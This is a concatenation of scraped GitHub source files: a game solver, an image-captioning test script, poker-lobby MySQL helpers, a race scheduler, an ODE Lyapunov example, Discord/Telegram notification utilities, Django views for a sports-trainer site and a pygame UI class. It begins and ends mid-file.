range((len(s1)+len(s2))//2) :\n            if s1[i] == s2[i] : res.append(\"0\")\n            else : res.append(\"1\")\n        return \"\".join(res)\n\n    def XOR_word(w1,w2) :\n        #w1 = 8a\n        #w2 = 09\n        \n        print(\"funs tr xor word w1 :\",w1)\n        print(\"funs tr xor word w2 :\",w2)\n        \n        \nprint(tr.transport(\"2b\"))\n\n\n\n\n","repo_name":"ghdwpaks/AES","sub_path":"ENC/py/util/1dev_util_xor.py","file_name":"1dev_util_xor.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1028232287","text":"import json\n\n\ndef solver(position):\n    if game.hasSymmetry:\n        position = game.Canonical(position)\n    if position in value_dict.keys():\n        return value_dict[position]\n    else:\n        assign_value(position)\n        #return value_dict[position] -> Don't use this if I want to solve the game fully in one shot\n\n
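# --- added illustrative sketch (not part of the original module) ---\n# solver() only assumes that `game` exposes the attributes used above and below.\n# A minimal game object satisfying that interface might look like:\n#\n# class TenToZero:\n#     startingPos = 10\n#     hasSymmetry = False\n#     def PrimitiveValue(self, pos): return 'LOSE' if pos == 0 else 'NOT_PRIMITIVE'\n#     def GenerateMoves(self, pos): return [m for m in (1, 2) if m <= pos]\n#     def DoMove(self, pos, move): return pos - move\n\n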
def assign_value(position):\n    if game.PrimitiveValue(position) != 'NOT_PRIMITIVE': \n        # This position is primitive, so update value_dict and we are done\n        value = (game.PrimitiveValue(position), 0)\n        value_dict[position] = value\n        add_analysis(value)\n    else:\n        children = set()\n        child_values = {'WIN': [], 'LOSE': [], 'TIE': []}\n        for move in game.GenerateMoves(position):\n            child = game.DoMove(position, move)\n            if game.hasSymmetry:\n                child = game.Canonical(child)\n            if child not in children:\n                children.add(child)\n                if child not in value_dict:\n                    assign_value(child)\n                c_value = value_dict[child]\n                child_values[c_value[0]].append(c_value[1])\n        if 0 < len(child_values['LOSE']):\n            # If there exists a losing child, we're in a winning position, and we are done\n            # remoteness = minimum (remoteness of losing children) + 1\n            remoteness = min(child_values['LOSE']) + 1\n            value = ('WIN', remoteness)\n            value_dict[position] = value\n            add_analysis(value)\n        elif 0 < len(child_values['TIE']):\n            # If there is no losing child but there exists a tying child, we're in a tying position\n            # remoteness is calculated to terminate the game as quickly as possible\n            remoteness = min(child_values['TIE']) + 1\n            value = ('TIE', remoteness)\n            value_dict[position] = value\n            add_analysis(value)\n        else:\n            # If all children are winning, we're in a losing position\n            remoteness = max(child_values['WIN']) + 1\n            value = ('LOSE', remoteness)\n            value_dict[position] = value\n            add_analysis(value)\n\ndef add_analysis(value):\n    val, remoteness = value[0], value[1]\n    # if remoteness == 0:\n    #     primitive_states[val] += 1\n    all_positions[val] += 1\n    if remoteness in by_remoteness:\n        by_remoteness[remoteness][val] += 1\n    else:\n        by_remoteness[remoteness] = {'WIN': 0, 'LOSE': 0, 'TIE': 0}\n        by_remoteness[remoteness][val] += 1\n\n# How do I generalize this to any game? \n#for i in range(N, -1, -1):\n    #print(f\"{i}: {solver(i)}\")\n\ndef main(game_obj, module_name):\n    global game, value_dict\n    game = game_obj\n    starting_pos = game.startingPos\n    saveRes = input('Export data when finished? 
(Y/N): ').capitalize()\n    saveRes = saveRes == 'Y'\n    print(f\"Solving game...\")\n\n    # Used for game analysis\n    global primitive_states, all_positions, by_remoteness\n    # primitive_states = {'WIN': 0, 'LOSE': 0, 'TIE': 0}\n    all_positions = {'WIN': 0, 'LOSE': 0, 'TIE': 0}\n    by_remoteness = {}\n\n    # key: position, value: a tuple, (one of 'WIN', 'TIE', or 'LOSE' | remoteness)\n    value_dict = {}\n\n    solver(starting_pos)\n    # print(f'Primitive States: {primitive_states}')\n    print(f'Remoteness Analysis:')\n    # look the starting position up under its canonical key (the original hardcoded\n    # value_dict[0], which only works when the starting position happens to be 0)\n    start_key = game.Canonical(starting_pos) if game.hasSymmetry else starting_pos\n    print(f'Initial position is {value_dict[start_key][0]} in {value_dict[start_key][1]}.')\n    print('Remoteness, WIN, LOSE, TIE, TOTAL')\n    for k in sorted([key for key, _ in by_remoteness.items()], reverse=True):\n        w, l, t = by_remoteness[k]['WIN'], by_remoteness[k]['LOSE'], by_remoteness[k]['TIE']\n        total = w + l + t\n        print(f'{k}, {w}, {l}, {t}, {total}')\n    print(f'All Position Values: {all_positions}, with total: {sum(all_positions.values())}')\n\n    if saveRes:\n        configs = {'Configs':{}}\n        for attr_name in dir(game):\n            if not callable(getattr(game, attr_name)) and not attr_name.startswith(\"__\"):\n                attr_value = getattr(game, attr_name)\n                configs['Configs'].update({attr_name:attr_value})\n        value_dict.update(configs)\n        with open(f'./results/{module_name}_solved.json', 'w') as json_file:\n            json.dump(value_dict, json_file)\n        return value_dict\n    else:\n        return value_dict","repo_name":"aentum/GamesCraftersHF","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1942829502","text":"import os\nimport os.path as osp\nimport argparse\nimport numpy as np \nimport json\nimport time\n \nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm \n \nfrom coco_loader import coco_loader\nfrom torchvision import models \nfrom convcap import convcap\nfrom vggfeats import Vgg16Feats\nfrom evaluate import language_eval\n\n\ndef save_test_json(preds, resFile):\n    print('Writing %d predictions' % (len(preds)))\n    json.dump(preds, open(resFile, 'w')) \n\ndef test(args, split, modelfn=None, model_convcap=None, model_imgcnn=None):\n    \"\"\"Runs test on split=val/test with checkpoint file modelfn or loaded model_*\"\"\"\n\n    t_start = time.time()\n    data = coco_loader(args.coco_root, split=split, ncap_per_img=1)\n    print('[DEBUG] Loading %s data ... 
%f secs' % (split, time.time() - t_start))\n\n    data_loader = DataLoader(dataset=data, num_workers=args.nthreads,\\\n        batch_size=args.batchsize, shuffle=False, drop_last=True)\n\n    batchsize = args.batchsize\n    max_tokens = data.max_tokens\n    num_batches = np.int_(np.floor((len(data.ids)*1.)/batchsize))\n    print('[DEBUG] Running inference on %s with %d batches' % (split, num_batches))\n\n    if(modelfn is not None):\n        model_imgcnn = Vgg16Feats()\n        model_imgcnn.cuda() \n\n        model_convcap = convcap(data.numwords, args.num_layers, is_attention=args.attention)\n        model_convcap.cuda()\n\n        print('[DEBUG] Loading checkpoint %s' % modelfn)\n        checkpoint = torch.load(modelfn)\n        model_convcap.load_state_dict(checkpoint['state_dict'])\n        model_imgcnn.load_state_dict(checkpoint['img_state_dict'])\n    else:\n        model_imgcnn = model_imgcnn\n        model_convcap = model_convcap\n\n    model_imgcnn.train(False) \n    model_convcap.train(False)\n\n    pred_captions = []\n    #Test epoch\n    for batch_idx, (imgs, _, _, _, img_ids) in \\\n        tqdm(enumerate(data_loader), total=num_batches):\n        \n        imgs = imgs.view(batchsize, 3, 224, 224)\n\n        imgs_v = Variable(imgs.cuda())\n        imgsfeats, imgsfc7 = model_imgcnn(imgs_v)\n        _, featdim, feat_h, feat_w = imgsfeats.size()\n        \n        wordclass_feed = np.zeros((batchsize, max_tokens), dtype='int64')\n        wordclass_feed[:,0] = data.wordlist.index('<S>') \n\n        outcaps = np.empty((batchsize, 0)).tolist()\n\n        for j in range(max_tokens-1):\n            wordclass = Variable(torch.from_numpy(wordclass_feed)).cuda()\n\n            wordact, _ = model_convcap(imgsfeats, imgsfc7, wordclass)\n\n            wordact = wordact[:,:,:-1]\n            wordact_t = wordact.permute(0, 2, 1).contiguous().view(batchsize*(max_tokens-1), -1)\n\n            wordprobs = F.softmax(wordact_t, dim=1).cpu().data.numpy()\n            wordids = np.argmax(wordprobs, axis=1)\n\n            for k in range(batchsize):\n                word = data.wordlist[wordids[j+k*(max_tokens-1)]]\n                outcaps[k].append(word)\n                if(j < max_tokens-1):\n                    wordclass_feed[k, j+1] = wordids[j+k*(max_tokens-1)]\n\n        for j in range(batchsize):\n            num_words = len(outcaps[j]) \n            if 'EOS' in outcaps[j]:\n                num_words = outcaps[j].index('EOS')\n            outcap = ' '.join(outcaps[j][:num_words])\n            pred_captions.append({'image_id': img_ids[j], 'caption': outcap})\n\n    scores = language_eval(pred_captions, args.model_dir, split)\n\n    model_imgcnn.train(True) \n    model_convcap.train(True)\n\n    return scores \n    \n
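# --- added note (not part of the original file) ---\n# The token loop above decodes greedily: each step's argmax word id is written\n# back into wordclass_feed[:, j+1] and re-read at the next step, so the\n# captioner always conditions on its own best guess; a beam search over the\n# top-k prefixes is the usual higher-quality alternative.\n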
","repo_name":"aditya12agd5/convcap","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"5"} +{"seq_id":"10169930972","text":"from datetime import datetime\nimport mysql.connector\n\n\n\nclass DatabaseInteraction:\n    def __init__(self):\n        self.config = {\n            \"user\": \"root\",\n            \"password\": \"Password66\",\n            \"host\": \"127.0.0.1\",\n            \"database\": \"poker_game\"\n        }\n\n    def get_username(self, user_id):\n        connection = None  # guard: if connect() raises, the finally block must not hit an unbound name\n        try:\n            connection = mysql.connector.connect(**self.config)\n            cursor = connection.cursor()\n\n            # Retrieve the username for the given user_id\n            cursor.execute(\"SELECT username FROM users WHERE user_id = %s\", (user_id,))\n            username = cursor.fetchone()[0]\n\n            return username\n        except Exception as e:\n            print(f\"Error: {e}\")\n            return \"Invalid\"\n        finally:\n            if connection is not None and connection.is_connected():\n                cursor.close()\n                connection.close()\n\n    def get_all_lobbies(self, status_filter, odds_filter):\n        connection = None\n        try:\n            connection = mysql.connector.connect(**self.config)\n            cursor = connection.cursor()\n\n            # Modify the SQL query to also get the count of players in each lobby\n            cursor.execute(\"\"\"\n                SELECT l.lobby_id, l.name, l.status, COUNT(pl.user_id), l.created_at, l.show_odds\n                FROM lobbies l\n                LEFT JOIN player_lobbies pl ON l.lobby_id = pl.lobby_id\n                WHERE l.status = %s AND l.show_odds = %s\n                GROUP BY l.lobby_id\n            \"\"\", (status_filter, odds_filter))\n\n            lobbies = cursor.fetchall()\n\n            return [{\n                'lobby_id': lobby[0],\n                'name': lobby[1],\n                'status': lobby[2],\n                'player_count': lobby[3],\n                'created_at': lobby[4].strftime('%Y-%m-%d %H:%M:%S'),  # Convert datetime to string\n                'show_odds': lobby[5]\n            } for lobby in lobbies]\n\n        except Exception as e:\n            print(f\"Error: {e}\")\n            return []\n        finally:\n            if connection is not None and connection.is_connected():\n                cursor.close()\n                connection.close()\n\n    def create_lobby(self, lobby_data):\n        response = {\"success\": True, \"error\": None}\n        connection = None\n        try:\n            connection = mysql.connector.connect(**self.config)\n            cursor = connection.cursor()\n\n            sql = \"\"\"\n            INSERT INTO lobbies (host_user_id, name, status, show_odds)\n            VALUES (%s, %s, %s, %s)\n            \"\"\"\n            cursor.execute(sql, (lobby_data['host_user_id'], lobby_data['name'], 'waiting', lobby_data['show_odds']))\n            connection.commit()\n\n        except mysql.connector.IntegrityError as e:\n            response[\"success\"] = False\n            response[\"error\"] = \"A lobby with this name already exists\"\n        except Exception as e:\n            response[\"success\"] = False\n            response[\"error\"] = f\"Error: {e}\"\n        finally:\n            if connection is not None and connection.is_connected():\n                cursor.close()\n                connection.close()\n\n        return response\n\n    def join_lobby(self, user_id, lobby_name):\n        response = {\"success\": True, \"error\": None}\n        connection = None\n        try:\n            connection = mysql.connector.connect(**self.config)\n            cursor = connection.cursor()\n\n            # Update the lobby to include the new player\n            sql = \"\"\"INSERT INTO player_lobbies (user_id, lobby_id) VALUES (%s, (SELECT lobby_id FROM lobbies WHERE \n            name = %s))\"\"\"\n            cursor.execute(sql, (user_id, lobby_name))\n            connection.commit()\n\n        except Exception as e:\n            response[\"success\"] = False\n            response[\"error\"] = f\"Error: {e}\"\n        finally:\n            if connection is not None and connection.is_connected():\n                cursor.close()\n                connection.close()\n\n        return response[\"success\"], response[\"error\"]\n\n    def remove_player_from_lobby(self, user_id, lobby_name):\n        connection = None\n        try:\n            connection = mysql.connector.connect(**self.config)\n            cursor = connection.cursor()\n\n            query = \"DELETE FROM player_lobbies WHERE user_id = %s AND lobby_id = (SELECT lobby_id FROM lobbies WHERE name = %s)\"\n            cursor.execute(query, (user_id, lobby_name))\n            connection.commit()\n\n        except Exception as e:\n            print(f\"Error removing player from lobby database: {e}\")\n        finally:\n            if connection is not None and connection.is_connected():\n                cursor.close()\n                connection.close()\n\n\n","repo_name":"4wzy/Poker-NEA","sub_path":"logic/database_interaction.py","file_name":"database_interaction.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14568887976","text":"from collections import deque\n\n\nclass RaceBase(object):\n    MAX_ROUNDS = 30\n\n    def __init__(self, lanes, cars, rounds):\n        self.rounds = min(rounds, self.MAX_ROUNDS)\n        self.cars = cars\n        self.lanes = lanes\n\n    def generate_rounds(self):\n        rounds = []\n        for r in range(1, self.rounds + 1):\n            rounds.append(self.generate_heats(r))\n        return rounds\n\n    def generate_heats(self, current_round):\n        \"\"\"\n        Create the heats for a single round.\n        Should return a list of heats containing the list of cars\n        \"\"\"\n        raise NotImplementedError\n\n    def list_racer_opponent(self, rounds):\n        racers = [[] 
for i in self.cars]\n for rd in rounds:\n for h in rd:\n for l in h:\n racers[l].extend(h)\n return racers\n\n def list_racer_lanes(self, rounds):\n totals = [[0 for j in self.lanes] for i in self.cars]\n for rd in rounds:\n for h in rd:\n for i, l in enumerate(h):\n totals[l][i] += 1\n return totals\n\n @staticmethod\n def chunks(l, n, rotate=0):\n c = []\n for i in range(0, len(l), n):\n d = deque(l[i:i+n])\n d.rotate(-rotate)\n c.append(list(d))\n return c","repo_name":"olsenb/derby_pi","sub_path":"derby/race/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8615196871","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFor instance, let’s interpret the system from `example` as two oscillators (which is what it is), one consisting of the first and second and one of the third and fourth component. Furthermore, let’s change the control parameters a bit to make the two oscillators identical. We can then calculate the transversal Lyapunov exponents to the synchronisation manifold as follows (important changes are highlighted):\n\n.. literalinclude:: ../examples/double_fhn_transversal_lyap.py\n\t:emphasize-lines: 6, 12, 14, 17, 19-20\n\t:start-after: example-st\\u0061rt\n\t:dedent: 1\n\t:linenos:\n\nNote that the initial state (line 17) is reduced in dimensionality and there is only one component for each synchronisation group.\n\"\"\"\n\nif __name__ == \"__main__\":\n\t# example-start\n\tfrom jitcode import jitcode_transversal_lyap, y\n\tfrom scipy.stats import sem\n\timport numpy as np\n\t\n\ta = -0.025794\n\tb = 0.01\n\tc = 0.02\n\tk = 0.128\n\t\n\tf = [\n\t\ty(0) * ( a-y(0) ) * ( y(0)-1.0 ) - y(1) + k * (y(2) - y(0)),\n\t\tb*y(0) - c*y(1),\n\t\ty(2) * ( a-y(2) ) * ( y(2)-1.0 ) - y(3) + k * (y(0) - y(2)),\n\t\tb*y(2) - c*y(3)\n\t\t]\n\t\n\tinitial_state = np.array([1.,2.])\n\t\n\tgroups = [ [0,2], [1,3] ]\n\tODE = jitcode_transversal_lyap(f, groups=groups)\n\tODE.set_integrator(\"lsoda\")\n\tODE.set_initial_value(initial_state,0.0)\n\t\n\ttimes = range(10,100000,10)\n\tlyaps = []\n\tfor time in times:\n\t\tlyaps.append(ODE.integrate(time)[1])\n\t\n\tlyap = np.average(lyaps[1000:])\n\tstderr = sem(lyaps[1000:]) # Note that this only an estimate\n\tprint(\"transversal Lyapunov exponent: % .4f ± %.4f\" % (lyap,stderr))\n\n","repo_name":"neurophysik/jitcode","sub_path":"examples/double_fhn_transversal_lyap.py","file_name":"double_fhn_transversal_lyap.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"5"} +{"seq_id":"38907133722","text":"# -*- coding: utf-8 -*-\n#########################################################\n\nimport os\nimport traceback\n\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nfrom telepot2 import Bot, glance\nfrom telepot2.loop import MessageLoop\n\nfrom . 
import logger\n\nclass ToolBaseNotify(object):\n\n @classmethod\n def send_message(cls, text, message_id=None, image_url=None):\n from system.model import ModelSetting as SystemModelSetting\n if SystemModelSetting.get_bool('notify_advaned_use'):\n return cls.send_advanced_message(text, image_url=image_url, message_id=message_id)\n else:\n if SystemModelSetting.get_bool('notify_telegram_use'):\n cls.send_telegram_message(text, image_url=image_url, bot_token=SystemModelSetting.get('notify_telegram_token'), chat_id=SystemModelSetting.get('notify_telegram_chat_id'))\n if SystemModelSetting.get_bool('notify_discord_use'):\n cls.send_discord_message(text, image_url=image_url, webhook_url=SystemModelSetting.get('notify_discord_webhook')) \n\n @classmethod\n def send_advanced_message(cls, text, image_url=None, policy=None, message_id=None):\n from system.model import ModelSetting as SystemModelSetting\n try:\n if policy is None:\n policy = SystemModelSetting.get('notify_advaned_policy')\n\n if message_id is None:\n message_id = 'DEFAULT'\n \n policy_list = cls._make_policy_dict(policy)\n #logger.debug(policy_list)\n #logger.debug(message_id)\n if message_id.strip() not in policy_list:\n message_id = 'DEFAULT'\n \n for tmp in policy_list[message_id.strip()]:\n if tmp.startswith('http'):\n cls.send_discord_message(text, image_url=image_url, webhook_url=tmp)\n elif tmp.find(',') != -1:\n tmp2 = tmp.split(',')\n cls.send_telegram_message(text, image_url=image_url, bot_token=tmp2[0], chat_id=tmp2[1])\n return True\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n #logger.debug('Chatid:%s', chat_id)\n return False\n\n @classmethod\n def _make_policy_dict(cls, policy):\n try:\n ret = {}\n for t in policy.split('\\n'):\n t = t.strip()\n if t == '' or t.startswith('#'):\n continue\n else:\n tmp2 = t.split('=')\n if len(tmp2) != 2:\n continue\n ret[tmp2[0].strip()] = [x.strip() for x in tmp2[1].split('|')]\n return ret\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n return False\n\n @classmethod\n def send_discord_message(cls, text, image_url=None, webhook_url=None):\n from system.model import ModelSetting as SystemModelSetting\n try:\n if webhook_url is None:\n webhook_url = SystemModelSetting.get('notify_discord_webhook')\n \n webhook = DiscordWebhook(url=webhook_url, content=text)\n if image_url is not None:\n embed = DiscordEmbed()\n embed.set_timestamp()\n embed.set_image(url=image_url)\n webhook.add_embed(embed)\n response = webhook.execute()\n #discord = response.json()\n #logger.debug(discord)\n return True\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n return False\n\n @classmethod\n def send_telegram_message(cls, text, bot_token=None, chat_id=None, image_url=None, disable_notification=None):\n from system.model import ModelSetting as SystemModelSetting\n try:\n if bot_token is None:\n bot_token = SystemModelSetting.get('notify_telegram_token')\n \n if chat_id is None:\n chat_id = SystemModelSetting.get('notify_telegram_chat_id')\n\n if disable_notification is None:\n disable_notification = SystemModelSetting.get_bool('notify_telegram_disable_notification')\n\n bot = Bot(bot_token)\n if image_url is not None:\n #bot.sendPhoto(chat_id, text, caption=caption, disable_notification=disable_notification)\n bot.sendPhoto(chat_id, image_url, disable_notification=disable_notification)\n 
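# added note: the caption text goes out as a second, separate message after the photo\n                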
bot.sendMessage(chat_id, text, disable_web_page_preview=True, disable_notification=disable_notification)\n #elif mime == 'video':\n # bot.sendVideo(chat_id, text, disable_notification=disable_notification)\n return True\n except Exception as exception: \n logger.error('Exception:%s', exception)\n logger.error(traceback.format_exc()) \n logger.debug('Chatid:%s', chat_id)\n return False\n\n","repo_name":"soju6jan/SJVA3","sub_path":"lib/tool_base/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"32021139726","text":"import datetime\nfrom datetime import date\nfrom django.shortcuts import render\nfrom .models import Client, Team, Trainer, Activity, Sport, News, TrainerStatus\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.shortcuts import get_object_or_404\nimport json\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.db.models import Count\n\n\n\ndef login_page(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse('main'))\n else:\n return render(request, 'trainers/login.html')\n\n\ndef log_in(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse('login_page'))\n else:\n return HttpResponseRedirect(reverse('main'))\n\n\ndef log_out(request):\n logout(request)\n return HttpResponseRedirect(reverse('login_page'))\n\n\n\ndef main(request):\n if request.user.is_authenticated:\n news = News.objects.filter(pub_date__lte=timezone.now(), expiry_date__gt=timezone.now())\n\n user = request.user\n try:\n trainer = Trainer.objects.get(user=user)\n is_trainer = True\n except Trainer.DoesNotExist:\n trainer = None\n is_trainer = False\n context = {'userinfo': user, 'trainer': trainer, 'is_trainer': is_trainer, 'news': news}\n return render(request, 'trainers/main.html', context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\ndef clients(request):\n if request.user.is_authenticated:\n clients = Client.objects.all()\n teams = Team.objects.all()\n\n sports = Sport.objects.annotate(team_count=Count('team'))\n\n\n context = {'clients': clients, 'teams': teams, 'sports': sports}\n\n return render(request, \"trainers/clients.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\ndef client_info(request, client_id):\n if request.user.is_authenticated:\n client = get_object_or_404(Client, pk=client_id)\n adr = client.address_set.all()\n context = {'client': client, 'adr': adr}\n return render(request, \"trainers/clients_info.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\ndef client_add_action(request):\n client_name = request.POST['client_name']\n client_surname = request.POST['client_surname']\n client_birthdate = request.POST['client_birthdate']\n try:\n Client.objects.create(first_name=client_name, last_name=client_surname, birth_date=client_birthdate)\n return HttpResponseRedirect(reverse('clients'))\n except:\n return HttpResponseRedirect(reverse('client_add'))\n\n\ndef teams(request):\n if request.user.is_authenticated:\n team = Team.objects.all()\n context = {'teams': team}\n return render(request, 
\"trainers/teams.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\ndef team_add_action(request):\n team_name = request.POST['name']\n members = request.POST.getlist('members')\n trainer = request.POST['trainer']\n date_end = request.POST['date_end']\n days = request.POST.getlist('days')\n act_begin_time = request.POST['act_begin_time']\n act_end_time = request.POST['act_end_time']\n price = request.POST['price']\n sport = request.POST['sport']\n try:\n tr = get_object_or_404(Trainer, pk=trainer)\n team = Team.objects.create(name=team_name, trainer=tr)\n for client in members:\n team.clients.add(client)\n\n date1 = datetime.date.today()\n date2 = datetime.datetime.strptime(date_end, '%Y-%m-%d')\n\n while date1 <= date2.date():\n if str(date1.weekday()) in days:\n act = Activity(act_date=date1, act_time_begin=act_begin_time,\n act_time_end=act_end_time, trainer=tr, price=price)\n act.save()\n for client in members:\n act.clients.add(client)\n act.save()\n date1 = date1 + datetime.timedelta(days=1)\n\n return HttpResponseRedirect(reverse('teams'))\n except:\n return HttpResponseRedirect(reverse('team_add'))\n\n\ndef trainers(request):\n if request.user.is_authenticated:\n trainers = Trainer.objects.all()\n sport = Sport.objects.all()\n status = TrainerStatus.objects.all()\n\n if request.GET.get('status'):\n trainers = trainers.filter(status__name=request.GET.get('status'))\n\n if request.GET.get('sports'):\n trainers = trainers.filter(sports__name=request.GET.get('sports'))\n\n\n\n today = date.today()\n trainers_birth = Trainer.objects.all().order_by('birthdate')\n upcoming_birthdays = []\n today_birthdays = []\n for trainer in trainers_birth:\n #дата> рождения тренера в этом году\n birthdate_this_year = date(today.year, trainer.birthdate.month, trainer.birthdate.day)\n if birthdate_this_year < today:\n birthdate_this_year = date(today.year + 1, trainer.birthdate.month, trainer.birthdate.day)\n #оставшееся время до дня рождения\n time_to_birthday = (birthdate_this_year - today).days\n if time_to_birthday <= 7 & time_to_birthday != 0:\n upcoming_birthdays.append(trainer)\n if time_to_birthday == 0:\n today_birthdays.append(trainer)\n trainers_search = []\n query = request.GET.get('q')\n if query:\n trainers_search = Trainer.objects.filter(Q(user__first_name__icontains=query) | Q(user__email__icontains=query))\n\n context = {'trainers': trainers, 'status': status, 'sport': sport, 'upcoming_birthdays': upcoming_birthdays, 'today_birthdays': today_birthdays, 'trainers_search': trainers_search, 'query': query}\n\n return render(request, \"trainers/trainers.html\", context)\n else:\n return HttpResponseRedirect(reverse('login_page'))\n\n\n\ndef trainers_add_action(request):\n trainer_name = request.POST['name']\n trainer_last_name = request.POST['last_name']\n trainer_otchestv = request.POST['otchestv']\n trainer_mail = request.POST['mail']\n trainer_pass = request.POST['password']\n trainer_birthdate = request.POST['birth_date']\n try:\n user = User.objects.create_user(username=trainer_mail, email=trainer_mail, password=trainer_pass)\n user.last_name = trainer_last_name\n user.first_name = trainer_name\n user.save()\n print('user created')\n trainer = Trainer(user=user, otchestv=trainer_otchestv, birthdate=trainer_birthdate)\n trainer.save()\n return HttpResponseRedirect(reverse('trainers'))\n except:\n return HttpResponseRedirect(reverse('trainers'))\n#\n# def activity(request):\n# if request.user.is_authenticated:\n# activity_list = Activity.objects.all()\n# 
context = {'activities': activity_list}\n# return render(request, \"trainers/schedule.html\", context)\n# else:\n# return HttpResponseRedirect(reverse('login_page'))\n#\n#\n# def activity_info(request, activity_id):\n# if request.user.is_authenticated:\n# act = get_object_or_404(Activity, pk=activity_id)\n# clients = act.clients.all()\n# context = {'act': act, 'clients': clients}\n# return render(request, \"trainers/act_info.html\", context)\n# else:\n# return HttpResponseRedirect(reverse('login_page'))\n#\n#\n# def activity_change(request, activity_id):\n# status = request.POST['status']\n# client_who_was = request.POST.getlist('client')\n# act = get_object_or_404(Activity, pk=activity_id)\n# try:\n# if status == \"Состоится\":\n# for id in client_who_was:\n# client = get_object_or_404(Client, pk=id)\n# client.balance = client.balance - act.price\n# client.save()\n# act.status = status\n# act.save()\n# elif status == \"Отменено\":\n# act.status = status\n# act.save()\n# return HttpResponseRedirect(reverse('activity'))\n# except:\n# return HttpResponseRedirect(reverse('activity'))\n\n\ndef schedule(request):\n if request.user.is_authenticated:\n activities = Activity.objects.all()\n context = [activity.to_json() for activity in activities]\n context = json.dumps(context)\n return render(request, \"trainers/schedule.html\", {'activities': context})\n else:\n return HttpResponseRedirect(reverse('login_page'))\n","repo_name":"Tangusik/test","sub_path":"trainers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25178438966","text":"import pygame\r\nimport Events\r\n\r\nfrom Button import Button\r\nfrom CheckBox import CheckBox\r\nfrom Slider import Slider\r\nfrom TextField import TextField\r\n\r\nclass Interface(object):\r\n\r\n def __init__(self):\r\n self.buttons = list()\r\n self.checkBoxes = dict()\r\n self.sliders = dict()\r\n self.textFields = dict()\r\n\r\n def addButton(self, index, iconPath, x, y, active=True, visible=True, mask=None):\r\n newButton = Button(index, iconPath, x, y, active, visible, mask)\r\n newButton.updateHover()\r\n\r\n self.buttons.append(newButton)\r\n\r\n def addCheckBox(self, tag, iconPath, x, y, checked=False, active=True, visible=True, mask=None):\r\n newCheckBox = CheckBox(iconPath, x, y, checked, active, visible, mask)\r\n newCheckBox.updateHover()\r\n\r\n self.checkBoxes[tag] = newCheckBox\r\n\r\n def addSlider(self, tag, icon, mask, boundaries, default, x, y, vertical=False, active=True, visible=True):\r\n newSlider = Slider(icon, mask, boundaries, default, x, y, vertical, active, visible)\r\n newSlider.updateHover()\r\n\r\n self.sliders[tag] = newSlider\r\n\r\n def addTextField(self, tag, image, x, y, color=0xFFFFFF, size=16, text=\"\", focused=False, active=True, visible=True, mask=None):\r\n newTextField = TextField(image, x, y, color, size, text, focused, active, visible, mask)\r\n newTextField.updateHover()\r\n\r\n self.textFields[tag] = newTextField\r\n\r\n def boxChecked(self, tag):\r\n return self.checkBoxes[tag].checked\r\n\r\n def getSliderValue(self, tag):\r\n return self.sliders[tag].value\r\n\r\n def getText(self, tag):\r\n return self.textFields[tag].text\r\n\r\n def handle(self, event):\r\n output = list()\r\n\r\n for tf in self.textFields.values():\r\n tf.inputText(event)\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n for i in self.buttons + self.checkBoxes.values() + self.sliders.values() + 
